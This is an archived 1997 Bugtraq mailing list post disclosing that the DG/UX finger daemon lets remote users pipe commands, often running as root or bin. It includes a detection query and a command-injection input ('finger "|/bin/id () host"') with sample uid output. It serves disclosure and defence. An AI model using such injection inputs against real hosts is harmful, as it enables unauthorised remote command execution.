Home page logo

bugtraq logo Bugtraq mailing list archives

dgux in.fingerd vulnerability
From: gti () HOPI DTCC EDU (George Imburgia)
Date: Mon, 11 Aug 1997 12:32:38 -0400

Another old bug that won't die.

The finger daemon that ships with dgux will allow a remote user to pipe
commands, often with uid root or bin.

To check for this vulnerability, simply use the RFC compliant syntax;

finger /W () host

If it returns something like this, it may be vulnerable;

Login name: /W                          In real life: ???

To see the uid in.fingerd is running as, try this;

finger "|/bin/id () host"

Often, you will see something like this;

uid=0(root) gid=0(root)


uid=2(bin) gid=2(bin) groups=2(bin),3(sys),5(mail)

= George Imburgia                       =
= Network Specialist, Computer Services =
= Office of the President               =
= Delaware Tech                         =

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]